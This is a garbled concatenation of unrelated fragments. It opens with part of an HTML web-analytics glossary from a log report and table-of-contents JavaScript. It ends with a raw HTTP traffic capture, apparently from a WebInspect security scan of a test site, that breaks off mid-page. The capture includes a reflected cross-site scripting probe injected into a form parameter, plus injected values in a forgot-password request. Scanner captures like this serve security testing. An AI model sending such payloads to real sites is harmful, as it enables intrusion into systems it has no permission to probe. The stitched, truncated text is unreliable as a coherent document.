<TR BGCOLOR="#FFFFFF">
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Log File</B></TD>
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">A file created by a web or proxy server which contains all of the access information regarding the activity on that server.</TD></TR>
<TR BGCOLOR="#F0F0F0">
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Page Views</B></TD>
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">Also called Page Impressions. Hit to HTML pages only (access to non-HTML documents are not counted).</TD></TR>
<TR BGCOLOR="#FFFFFF">
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Platform</B></TD>
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">The operating system (i.e. Windows 95, Windows NT, etc.) used by a visitor to the site.</TD></TR>
<TR BGCOLOR="#F0F0F0">
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Protocol</B></TD>
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">An established method of exchanging data over the Internet.</TD></TR>
<TR BGCOLOR="#FFFFFF">
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Referrer</B></TD>
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">URL of an HTML page that refers to the site.</TD></TR>
<TR BGCOLOR="#F0F0F0">
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Return Code</B></TD>
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">The return status of the request which specifies whether the transfer was successful and why.
<DL><DT><B>Possible "Success" codes are:</B>
<DD><B>200 = Success</B>: OK
<DD><B>201 = Success</B>: Created
<DD><B>202 = Success</B>: Accepted
<DD><B>203 = Success</B>: Partial Information
<DD><B>204 = Success</B>: No Response
<DD><B>300 = Success</B>: Redirected
<DD><B>301 = Success</B>: Moved
<DD><B>302 = Success</B>: Found
<DD><B>303 = Success</B>: New Method
<DD><B>304 = Success</B>: Not Modified
<DT><B>Possible "Failed" codes are</B>:
<DD><B>400 = Failed</B>: Bad Request
<DD><B>401 = Failed</B>: Unauthorized
<DD><B>402 = Failed</B>: Payment Required
<DD><B>403 = Failed</B>: Forbidden
<DD><B>404 = Failed</B>: Not Found
<DD><B>500 = Failed</B>: Internal Error
<DD><B>501 = Failed</B>: Not Implemented
<DD><B>502 = Failed</B>: Overloaded Temporarily
<DD><B>503 = Failed</B>: Gateway Timeout</DL></TD></TR>
<TR BGCOLOR="#FFFFFF">
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Server</B></TD>
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">A computer that hosts information available to anyone accessing the Internet.</TD></TR>
<TR BGCOLOR="#F0F0F0">
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Server Error</B></TD>
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">An error occurring at the server. Web server errors have codes in the 500 range.</TD></TR>
<TR BGCOLOR="#FFFFFF">
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Spiders</B></TD>
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">An automated program which searches the internet.</TD></TR>
<TR BGCOLOR="#F0F0F0">
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Suffix (Domain Name)</B></TD>
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">The three digit suffix of a domain can be used to identify the type of organization.
<DL><DT>Possible "Suffixes" are:
<DD>.com = Commercial
<DD>.edu = Educational
<DD>.int = International
<DD>.gov = Government
<DD>.mil = Military
<DD>.net = Network
<DD>.org = Organization</DL></TD></TR>
<TR BGCOLOR="#FFFFFF">
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>User Agent</B></TD>
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">Fields in an extended Web server log file identifying the browser and platform used by a visitor.</TD></TR>
<TR BGCOLOR="#F0F0F0">
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>URL</B></TD>
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">Uniform Resource Locator is a means of identifying an exact location on the Internet. For example, http://www.webtrends.com/html/info/default.htm is the URL which defines the use of HTTP to access the Web page Default.htm in the /html/info/ directory on the WebTrends Corporation Web site). As the previous example shows, a URL is comprised of four parts: Protocol Type (HTTP), Machine Name (webtrends.com), Directory Path (/html/info/), and File Name (default.htm).</TD></TR>
<TR BGCOLOR="#FFFFFF">
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>User Session</B></TD>
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">A session of activity (all hits) for one user of a web site. A unique user is determined by the IP address or cookie. By default, a user session is terminated when a user is inactive for more than 30 minutes. This duration can be changed from General panel in the Options, Web Log Analysis dialog. Synonym: Visit.</TD></TR>
<TR BGCOLOR="#F0F0F0">
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>View,Page</B></TD>
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">Each request for a particular web page which displays an ad. Also referred to as an impression.</TD></TR>
<TR BGCOLOR="#FFFFFF">
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Visit</B></TD>
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">Commonly called User Session. All activity for one user of a web site. By default, a user session is terminated when a user is inactive for more than 30 minutes.</TD></TR>
</TABLE>
<!-- GLOSSARY_END -->
</FONT>
<!-- ----------------- ------------- -->
-- ----------------- ------------- -->
<!-- ----------------- ------------- -->
<!-- WT_H1>MicroNetix Corporation</WT_H1 -->
<!-- WT_CRLF -->
<!-- WT_CENTER>This report was generated by MicroNetix Corp.</WT_CENTER -->
<!-- WT_END_STRIP -->
<FONT SIZE=3 FACE="Arial" COLOR="#000000">
<CENTER>
<br><br><a href="http://www.MicroNetix.com">
<img border=0 src="mlogo.gif" alt="MicroNetix Corporation"></a><P>
This report was generated by <A HREF="http://www.MicroNetix.com">MicroNetix Corp</A>.
</CENTER>
</FONT>
<BR>
<BR>
<html>
<head>
<title></title>
<script LANGUAGE=JavaScript1.2>
<!-- browser info object
function BrowserInfo() {
var agent = navigator.userAgent.toLowerCase();
this.major = parseInt(navigator.appVersion);
this.minor = parseFloat(navigator.appVersion);
this.ns = ((agent.indexOf('mozilla')!=-1) && ((agent.indexOf('spoofer')==-1) && (agent.indexOf('compatible') == -1)));
this.ns2 = (this.ns && (this.major == 3));
this.ns3 = (this.ns && (this.major == 3));
this.ns4 = (this.ns && (this.major >= 4));
this.ie = (agent.indexOf("msie") != -1);
this.ie3 = (this.ie && (this.major == 2));
this.ie4 = (this.ie && (this.major >= 4));
this.op3 = (agent.indexOf("opera") != -1);
}
var browserinfo = new BrowserInfo()
// -->
</script>
<script LANGUAGE=javascript>
<!-- toc data
function anItem(alink,adesc)
{
this.alink = alink
this.adesc = adesc
}
var VOLUMES = new Array
var CHAPTERS = new Array
var ITEMS = new Array
var bExpanded = true; // is tree initially expanded completely
var bLoaded = false; // tree is ready
var width = 400;
var height = 18;
var MAX_ITEMS = VOLUMES.length + ITEMS.length
var SPACER_HEIGHT = (MAX_ITEMS + 4) * height // allow space for toc to expand when all nodes visible
var listX = 2 // start x of list
var listY = 20 // start y of list
var bgColor = "#FFFFFF";
if(parseInt(navigator.appVersion) < 4)
{
var item = 0
var alink = ""
var adesc = ""
with (window.document)
{
writeln('<body bgcolor="#FFFFFF">')
writeln('<font size=3 face="Arial" color="#000000" ><b>Table of Contents</b></font>');
writeln('<BR>');
writeln('<BR>');
writeln('<table border=0 cellpadding=0 cellspacing=0>');
for (var volume = 1; volume <= (VOLUMES.length-1); volume++)
{
writeln('<TR>')
write(' <TD colspan=2><font size=2 face="Arial"><a href="' + VOLUMES[volume].alink + '" target="CONTENT"><b>' + VOLUMES[volume].adesc + '</b></a></font></td>')
writeln('</TR>')
for (var chapters=1; chapters <= CHAPTERS[volume]; chapters++)
{
item += 1
alink = ITEMS[item].alink
adesc = ITEMS[item].adesc
writeln('<tr>')
write(' <td valign=top><font size=1 face="Arial"><B> • </B></TD>')
write(' <td><font size=1 face="Arial"><a href="' + alink + '" target="CONTENT"><b>' + adesc + '</b></a></font></td>')
writeln('</tr>')
}
writeln('<tr>')
write(' <td colspan=2><font size=2 face="Arial"> </font></td>')
writeln('</tr>')
}
writeln('</table>');
writeln('</body>')
}
}
// -->
</script>
<script LANGUAGE=JavaScript1.2>
<!-- browser info object
// resize and list functions
if(!window.saveInnerWidth) {
window.onresize = resize;
window.saveInnerWidth = window.innerWidth;
window.saveInnerHeight = window.innerHeight;
}
function resize() {
if (saveInnerWidth < window.innerWidth ||
saveInnerWidth > window.innerWidth ||
saveInnerHeight > window.innerHeight ||
saveInnerHeight < window.innerHeight )
{
window.history.go(0);
}
}
var _id = 0, _pid = 0, _lid = 0, _pLayer;
var _mLists = new Array();
document.lists = _mLists;
// adapted DevEdge Online sample code :author Michael Bostock
function List(visible, width, height, bgColor) {
this.setIndent = setIndent;
this.addItem = addItem;
this.addList = addList;
this.build = build;
this.rebuild = rebuild;
this.setFont = _listSetFont;
this._writeList = _writeList;
this._showList = _showList;
this._updateList = _updateList;
this._updateParent = _updateParent;
this.onexpand = null; this.postexpand = null;
this.lists = new Array();
this.items = new Array();
this.types = new Array();
this.strs = new Array();
this.x = 0;
this.y = 0;
this.visible = visible;
this.id = _id;
this.i = 18;
this.space = true;
this.pid = 0;
this.fontIntro = false;
this.fontOutro = false;
this.width = width;
this.height = height;
this.parLayer = false;
this.built = false;
this.shown = false;
this.needsUpdate = false;
this.needsRewrite = false;
this.parent = null;
this.l = 0;
if(bgColor) this.bgColor = bgColor;
else this.bgColor = null;
_mLists[_id++] = this;
}
function _listSetFont(i,j) {
this.fontIntro = i;
this.fontOutro = j;
}
function setIndent(indent) { this.i = indent; if(this.i < 0) { this.i = 0; this.space = false;} this.space = false; }
function setClip(layer, l, r, t, b) {
if(browserinfo.ns4) {
layer.clip.left = l; layer.clip.right = r;
layer.clip.top = t; layer.clip.bottom = b;
} else {
layer.style.pixelWidth = r-l;
layer.style.pixelHeight = b-t;
layer.style.clip = "rect("+t+","+r+","+b+","+l+")";
}
}
function _writeList() {
var layer, str, clip;
for(var i = 0; i < this.types.length; i++) {
layer = this.items[i];
if(browserinfo.ns4) layer.visibility = "hidden";
else layer.style.visibility = "hidden";
str = "";
if(browserinfo.ns4) layer.document.open();
str += "<form name=reptoc><TABLE bgcolor=#FFFFFF WIDTH="+this.width+" BORDER=0 CELLPADDING=0 CELLSPACING=0><TR>";
if(this.types[i] == "list") {
str += "<TD WIDTH=15 VALIGN=MIDDLE><A HREF=\"javascript:expand("+this.lists[i].id+");\"><IMG BORDER=0 SRC=\"true.gif\" NAME=\"_img"+this.lists[i].id+"\"></A></TD>";
_pid++;
} else if(this.space)
str += "<TD WIDTH=15 > </TD>";
if(this.l>0 && this.i>0) str += "<TD WIDTH="+this.l*this.i+" > </TD>";
str += "<TD HEIGHT="+(this.height-3)+" WIDTH="+(this.width-15-this.l*this.i)+" VALIGN=MIDDLE ALIGN=LEFT>";
self.status = "Table of Contents: " + ITEMS[i+1].adesc
if(this.fontIntro) str += this.fontIntro;
str += this.strs[i];
if(this.fontOutro) str += this.fontOutro;
str += "</TD></TABLE></form>";
if(browserinfo.ns4) {
layer.document.writeln(str);
layer.document.close();
} else layer.innerHTML = str;
if(this.types[i] == "list" && this.lists[i].visible)
this.lists[i]._writeList();
}
this.built = true;
this.needsRewrite = false;
self.status = '';
}
function _showList() {
var layer;
for(var i = 0; i < this.types.length; i++) {
layer = this.items[i];
setClip(layer, 0, this.width, 0, this.height-1);
if(browserinfo.ie4) {
if(layer.oBgColor) layer.style.backgroundColor = layer.oBgColor;
else layer.style.backgroundColor = this.bgColor;
} else {
if(layer.oBgColor) layer.document.bgColor = layer.oBgColor;
else layer.document.bgColor = this.bgColor;
}
if(this.types[i] == "list" && this.lists[i].visible)
this.lists[i]._showList();
}
this.shown = true;
this.needsUpdate = false;
}
function _updateList(pVis, x, y) {
var currTop = y, layer;
for(var i = 0; i < this.types.length; i++) {
layer = this.items[i];
if(this.visible && pVis) {
if(browserinfo.ns4) {
layer.visibility = "visible";
layer.top = currTop;
layer.left = x;
} else {
layer.style.visibility = "visible";
layer.style.pixelTop = currTop;
layer.style.pixelLeft = x;
}
currTop += this.height;
} else {
if(browserinfo.ns4) layer.visibility = "hidden";
else layer.style.visibility = "hidden";
}
if(this.types[i] == "list") {
if(this.lists[i].visible) {
if(!this.lists[i].built || this.lists[i].needsRewrite) this.lists[i]._writeList();
if(!this.lists[i].shown || this.lists[i].needsUpdate) this.lists[i]._showList();
if(browserinfo.ns4) layer.document.images[0].src = "true.gif";
else eval('document.images._img'+this.lists[i].id+'.src = "true.gif"');
} else {
if(browserinfo.ns4) layer.document.images[0].src = "false.gif";
else eval('document.images._img'+this.lists[i].id+'.src = "false.gif"');
}
if(this.lists[i].built)
currTop = this.lists[i]._updateList(this.visible && pVis, x, currTop);
}
}
return currTop;
}
function _updateParent(pid, l) {
var layer;
if(!l) l = 0;
this.pid = pid;
this.l = l;
for(var i = 0; i < this.types.length; i++)
if(this.types[i] == "list")
this.lists[i]._updateParent(pid, l+1);
}
function expand(i) {
_mLists[i].visible = !_mLists[i].visible;
if(_mLists[i].onexpand != null) _mLists[i].onexpand(_mLists[i].id);
_mLists[_mLists[i].pid].rebuild();
if(_mLists[i].postexpand != null) _mLists[i].postexpand(_mLists[i].id);
}
function build(x, y) {
this._updateParent(this.id);
this._writeList();
this._showList();
this._updateList(true, x, y);
this.x = x; this.y = y;
}
function rebuild() { this._updateList(true, this.x, this.y); }
function addItem(str, bgColor, layer) {
var testLayer = false;
if(!document.all) document.all = document.layers;
if(!layer) {
if(browserinfo.ie4 || !this.parLayer) testLayer = eval('document.all.lItem'+_lid);
else {
_pLayer = this.parLayer;
testLayer = eval('_pLayer.document.layers.lItem'+_lid);
}
if(testLayer) layer = testLayer;
else {
if(browserinfo.ns4) {
if(this.parLayer) layer = new Layer(this.width, this.parLayer);
else layer = new Layer(this.width);
} else return;
}
}
if(bgColor) layer.oBgColor = bgColor;
this.items[this.items.length] = layer;
this.types[this.types.length] = "item";
this.strs[this.strs.length] = str;
_lid++;
}
function addList(list, str, bgColor, layer) {
var testLayer = false;
if(!document.all) document.all = document.layers;
if(!layer) {
if(browserinfo.ie4 || !this.parLayer) testLayer = eval('document.all.lItem'+_lid);
else {
_pLayer = this.parLayer;
testLayer = eval('_pLayer.document.layers.lItem'+_lid);
}
if(testLayer) layer = testLayer;
else {
if(browserinfo.ns4) {
if(this.parLayer) layer = new Layer(this.width, this.parLayer);
else layer = new Layer(this.width);
} else return;
}
}
if(bgColor) layer.oBgColor = bgColor;
this.lists[this.items.length] = list;
this.items[this.items.length] = layer;
this.types[this.types.length] = "list";
this.strs[this.strs.length] = str;
list.parent = this;
_lid++;
}
document.vlinkColor = document.linkColor
document.alinkColor = document.linkColor
document.linkColor = document.linkColor
var onit = new Image()
var ofit = new Image()
var cursel = new Image()
onit.src = "tocarw.gif"
ofit.src = "tocclr.gif"
cursel.src = "tocsel.gif"
var curlink = null
var prvlink = null
// List initialization
var subvar = new Array()
var image = 0
var vol = 0
var sublist = null
var l = new List(true, width, height, bgColor);
l.setFont("<FONT FACE='Arial' SIZE=-1'>","</FONT>");
function imgover(id){
if (browserinfo.ns4){
var objstr = "document.layers[" + id + "].document.reptoc.wt" + id
img = eval(objstr)
}
else{
img = eval("document.wt" + id)
}
if (curlink && img == curlink)
img.src = cursel.src
else
img.src = onit.src
}
function imgout(id){
var img
if (browserinfo.ns4){
var objstr = "document.layers[" + id + "].document.reptoc.wt" + id
img = eval(objstr)
}
else
img = eval("document.wt" + id)
if (curlink && img == curlink)
img.src = cursel.src
else
img.src = ofit.src
}
function currentVol()
{
if (prvlink)
prvlink.src = ofit.src
}
function current(id, bVolume)
{
if (browserinfo.ns4){
var objstr = "document.layers[" + id + "].document.reptoc.wt" + id
img = eval(objstr)
}
else
img = eval("document.wt" + id)
if (img && img != curlink){
curlink = img
if ( !bVolume )
curlink.src = cursel.src
if (prvlink)
prvlink.src = ofit.src
prvlink = curlink
}
}
function subnode(numElements){
this.list = new List(bExpanded, width, height, bgColor);
this.numElements = numElements
}
function initsublist()
{
sublist = new subnode(0)
sublist.list.setIndent(0);
sublist.list.setFont("<FONT FACE='Arial' SIZE=-2>","</FONT>");
cursublist = sublist
return sublist
}
function addsubitem(reportlink,reportdesc)
{
image++
cursublist.numElements++
cursublist.list.addItem("<nobr><img name=wt" + image + " src='tocclr.gif'><a href='" + reportlink + "' style='text-decoration:none' TARGET='CONTENT' onClick='current(" + image + ");return true;' onMouseOver='imgover(" + image + ");return true;' onMouseOut='imgout(" + image + ");return true;'> <font face='Arial'>" + reportdesc + "</font></A></nobr>");
}
function addvolume(vollink,voldesc)
{
vol++
image++
l.addList(cursublist.list, "<nobr><A HREF='" + vollink + "' TARGET='CONTENT' onClick='currentVol();return true;' style='color:#000000;text-decoration:none'>" + voldesc + "</a>");
}
function expandAll() {
if (bLoaded)
{
for (var i=1; i < l.types.length +1; i++)
{
_mLists[i].visible = true
if(_mLists[i].onexpand != null)
_mLists[i].onexpand(_mLists[i].id);
_mLists[_mLists[i].pid].rebuild();
if(_mLists[i].postexpand != null)
_mLists[i].postexpand(_mLists[i].id);
}
}
}
function collapseAll() {
if (bLoaded)
{
for (var i=1; i < l.types.length +1; i++)
{
_mLists[i].visible = false
if(_mLists[i].onexpand != null)
_mLists[i].onexpand(_mLists[i].id);
_mLists[_mLists[i].pid].rebuild();
if(_mLists[i].postexpand != null)
_mLists[i].postexpand(_mLists[i].id);
}
}
}
function init()
{
var item = 0
for (var volume = 1; volume <= (VOLUMES.length-1); volume++)
{
subvar[vol] = initsublist();
for (var chapters=1; chapters <= CHAPTERS[volume]; chapters++)
{
item++
subvar[vol] = addsubitem(ITEMS[item].alink, ITEMS[item].adesc)
}
addvolume(VOLUMES[volume].alink, VOLUMES[volume].adesc)
}
l.build(listX,listY);
bLoaded = true
}
// -->
</script>
<script language=javascript1.2>
<!--
var TOC_HTML
TOC_HTML = '<style TYPE="text/css">'
TOC_HTML += '#spacer {margin-top:0;position: absolute; height:' + SPACER_HEIGHT + ';z-index: 0}'
TOC_HTML += 'BODY {margin-top:1; margin-left:2; background-color:#FFFFFF;}'
for (var i=0; i <= MAX_ITEMS; i++)
{
TOC_HTML += '#lItem' + i + ' { position:absolute; }'
}
TOC_HTML += '</style>'
TOC_HTML += '<body marginHeight=1 marginWidth=2 bgcolor="#FFFFFF" onLoad="init();">'
if (browserinfo.ns4)
{
TOC_HTML += '<form name=frmtoc>'
TOC_HTML += '<a href="javascript:expandAll();"><img width=22 height=14 name=treExp valign=top border=0 alt="Expand all sections" src="expall.gif"></a>'
TOC_HTML += '<a href="javascript:collapseAll();"><img width=22 height=14 name=treCol valign=top border=0 alt="Collapse all sections" src="collall.gif"></a>'
TOC_HTML += '</form>'
}
else
{
TOC_HTML += '<img style="cursor:hand" onClick="expandAll();" width=22 height=14 border=0 alt="Expand all sections" src="expall.gif">'
TOC_HTML += '<img style="cursor:hand" onClick="collapseAll();" width=22 height=14 border=0 alt="Collapse all sections" src="collall.gif">'
}
TOC_HTML += '<div ID="spacer"></div>'
for (var i=0; i <= MAX_ITEMS; i++)
{
TOC_HTML += '<div ID="lItem' + i + '" name="lItem' + i + '"></div>'
}
document.writeln( TOC_HTML )
// -->
</script>
</head>
</HTML>
GET /linking/link1/link2/link3/link4/link5/link6/link7/link8/link9/ HTTP/1.0
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 403 Access Forbidden
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:24:31 GMT
Content-Type: text/html
Content-Length: 172
<html><head><title>Directory Listing Denied</title></head>
<body><h1>Directory Listing Denied</h1>This Virtual Directory does not allow contents to be listed.</body></html>GET /adcenter.cgi HTTP/1.0
Referer: http://zero.webappsecurity.com:80/pindex.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Date: Thu, 04 Dec 2003 16:24:18 GMT
Content-Type: application/octet-stream
Accept-Ranges: bytes
Last-Modified: Mon, 16 Jul 2001 03:38:19 GMT
ETag: "f2f6c2c1a8dc11:8f6"
Content-Length: 3118
<HTML>
<HEAD>
<TITLE>AdCenter Login Page</TITLE>
</HEAD>
<BODY BGCOLOR="#FFFFFF" LINK="#0000FF" VLINK="#0000FF">
<CENTER>
<TABLE CELLPADDING=0 CELLSPACING=0 WIDTH=625 BORDER=0 BGCOLOR="#33CC99">
<TR>
<TD>
<IMG SRC="http://www.heardinthehive.com/adimages/account_header.gif" WIDTH="625" HEIGHT="45" BORDER=0>
</TD>
</TR>
</TABLE>
<TABLE CELLPADDING=4 CELLSPACING=0 WIDTH=625 BORDER=0 BGCOLOR="#33CC99">
<TR>
<TD>
<CENTER>
<iframe src="http://pluto.adcycle.com/go/adcycle.cgi?group=1&media=1&id=681&delivery=iframe" height=60 width=468 border=0 marginheight=0 scrolling=no marginwidth=0 frameborder=no>
<a href="http://pluto.adcycle.com/go/adclick.cgi?manager=adcycle.com&id=681" target="_top"><img src="http://pluto.adcycle.com/go/adcycle.cgi?group=1&media=1&id=681" width=468 height=60 border=1 ALT="Click to Visit"></a>
</iframe><BR>
</CENTER>
</TD>
</TR>
</TABLE>
<TABLE CELLPADDING=0 CELLSPACING=0 WIDTH=625 BORDER=0>
<TR>
<TD BGCOLOR="#33CC99" VALIGN="TOP">
<IMG SRC="http://www.heardinthehive.com/adimages/clear.gif" WIDTH=20 HEIGHT=55><BR>
</TD>
<TD>
<IMG SRC="http://www.heardinthehive.com/adimages/top_blend.gif" WIDTH=585 HEIGHT=15><BR>
<TABLE CELLPADDING=20 CELLSPACING=0 width="100%" BORDER=0>
<TR>
<TD BGCOLOR="#FFFFFF">
<BR>
<FORM NAME="form1" ACTION="http://www.heardinthehive.com/cgi-bin/adcycle/adcenter.cgi" METHOD="GET">
<TABLE CELLPADDING=3 CELLSPACING=0 BORDER=0 BGCOLOR="000000">
<TR>
<TD ALIGN=LEFT WIDTH=95%>
<FONT FACE="VERDANA,ARIAL" SIZE=2 COLOR="WHITE"><STRONG> Account Login</STRONG></FONT>
</TD>
</TR>
<TR>
<TD BGCOLOR="FFFFFF">
<FONT FACE="VERDANA,ARIAL" SIZE=2>
User Name: <FONT FACE="VERDANA,ARIAL" SIZE=3><INPUT TYPE="TEXT" NAME="account" VALUE="" SIZE=14></FONT><BR>
<IMG SRC="http://www.heardinthehive.com/adimages/clear.gif" WIDTH=1 HEIGHT=4><BR>
<FONT FACE="VERDANA,ARIAL" SIZE=2>
Password: <FONT FACE="VERDANA,ARIAL" SIZE=3><INPUT TYPE="PASSWORD" NAME="pwd" VALUE="" SIZE=12></FONT><BR>
<FONT SIZE=2 FACE="VERDANA,ARIAL"><b>
<BR>
<INPUT TYPE="SUBMIT" NAME="change" VALUE="Login">
</TD>
</TR>
</TABLE>
<INPUT TYPE="HIDDEN" NAME="cache" VALUE="681">
</FORM>
<SCRIPT LANGUAGE="JavaScript">
<!--
var MC=document.cookie;
var temp;
if(MC){
var start=MC.indexOf("!!");
var end=MC.indexOf("!!",start+2);
temp=MC.substring(start+2,end);
if(temp.length > 1 && temp.length < 20){
document.form1.account.value=temp;
}
}
// -->
</SCRIPT>
<BR>
</TD>
</TR>
</TABLE>
<IMG SRC="http://www.heardinthehive.com/adimages/bottom_blend.gif" WIDTH=585 HEIGHT=15><BR>
</TD>
<TD BGCOLOR="#33CC99"><IMG SRC="http://www.heardinthehive.com/adimages/clear.gif" WIDTH=20 HEIGHT=1><BR></TD>
</TR>
</TABLE>
<IMG SRC="http://www.heardinthehive.com/adimages/account_footer.gif" WIDTH=625 HEIGHT=25><BR>
<TABLE CELLPADDING=0 CELLSPACING=0 WIDTH=625 BORDER=0>
<TR>
<TD align=right>
<font face=arial size=1>powered by <a href="http://www.adcycle.com">adcycle.com</a> v0.77b <IMG SRC="http://www.heardinthehive.com/adimages/clear.gif" WIDTH=20 HEIGHT=1><BR>
</TD>
</TR>
</TABLE>
</BODY>
</HTML>
GET /forgot1.asp?get=333%2D333%2D3333test@test999.com HTTP/1.0
Referer: http://zero.webappsecurity.com:80/forgot.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; passes=; passes2=; passes3=; CustomCookie=WebInspect
HTTP/1.1 302 Object moved
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:41:49 GMT
X-Powered-By: ASP.NET
Location: forgot2.asp?msg2=no&msg=We+could+not+find+your+e-mail+address+in+our+database.+Please+join+below.
Connection: Keep-Alive
Content-Length: 121
Content-Type: text/html
Cache-control: private
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="">here</a>.</body>
GET /join.asp?name=&email=&surname=&house=&street=&address2=&town=&postcode=&country=&homephone=>"><script>alert("XSS")</script>&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:55:32 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4006
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
